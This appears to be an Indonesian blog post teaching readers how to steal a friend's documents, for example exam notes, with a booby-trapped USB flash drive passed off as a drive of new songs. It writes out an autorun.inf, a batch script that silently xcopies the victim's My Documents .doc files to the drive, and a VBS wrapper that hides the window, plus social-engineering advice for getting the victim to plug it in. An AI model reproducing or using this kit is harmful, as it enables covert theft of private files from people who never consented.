3:50 PM
0

VS

Hmmm… mau sedikit bercerita nh….
Ok, bayangkan Net’ers sedang menghadapi ujian terakhir, dan Net’ers belum siap, tetapi teman Net’ers punya jawaban atau catatan penting di laptop atau di komputernya tapi tidak mau berbagi dengan Net’ers, dan teman Net’ers ini sedikit goblok, dan Net’ers kepengen mencuri isi dokumen yang berada dikomputernya.
Cara mencuri data di komputernya adalah dengan pergi kerumahnya dimalam hari dengan membawa flashdisk yang digantung dileher Net’ers, dan sembunyi2 masuk ke kamarnya dan mengcopy isi dokumen di harddisknya, jadi pencuri beneran nih? hehehehe. atau alternatif lain, kita kan temanan yah ceritanya, jadi bilang ajah gini ama dia, “Teman, aku punya lagu baru ini di flashdisk gue? mau copy ngga?” nah lalu kita copykan lagu nya ke komputer dia. (sssssttt diam2 yah!)

Kayaknya cara pertama diatas dengan menjadi pencuri beneran ngga enak yah? hehehe. langsung ajah kita pake cara halus. ikuti langkah2 berikut:
Sebelumnya siapin dulu flashdisk kita (kalo bisa isinya gede)

Langkah ke-1

Buka Notepad (saya sarankan pake program Notepad++) copy dan paste kode dibawah ini.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
 
Kemudian simpanlah di flashdisk dengan nama: autorun.inf

Langkah ke-2

Buka Notepad lagi dan copas kode berikut:

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off
cls
 
Simpan di flashdisk Net’ers dengan nama: file.bat

Langkah ke-3

Buka Notepad lagi dan copas kode berikut:

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
 
Simpan di flashdisk Net’ers dengan nama: invisible.vbs

Langkah ke-4

Buka Notepad lagi dan copas lagi kode berikut:

wscript.exe \invisible.vbs file.bat
 
Simpan di flashdisk Net’ers dengan nama: launch.bat

Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah folder baru dengan nama all untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah: %backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all\doc”, akan menyalin semua file ber-ekstensi .doc kedalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita dikomputernya, ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.

Sebelum mencoba mencuri file dikomputer teman, coba dulu flashdisk kita dikomputer kita sendiri, lihat apakah bekerja dengan baik.

Selamat mencoba !!

Semoga Bermanfaat !!!

(Pengunjung Yg Baik Slalu Membaca iklan Yg kami sediakan,Terimakasih)

NB : Bila ingin Copas ‘’Copy Paste’’ Tolong Cantumkan Link Blok ku ini  ya ^,^ Trimakasih.


0 komentar:

Post a Comment

Sungguh amat berterimakasih bila pengunjung meninggalkan koment untuk kemajuan Blog ini dan untuk Eksistensinya.. Terimakasih ^.^

BTCClicks.com Banner
Klik Close Untuk Gabung Ke Grup ==>> close

==:== Pasang Iklan Gratis 1 Bulan ==:==

==:== Kontak Admin Di Grup ==:==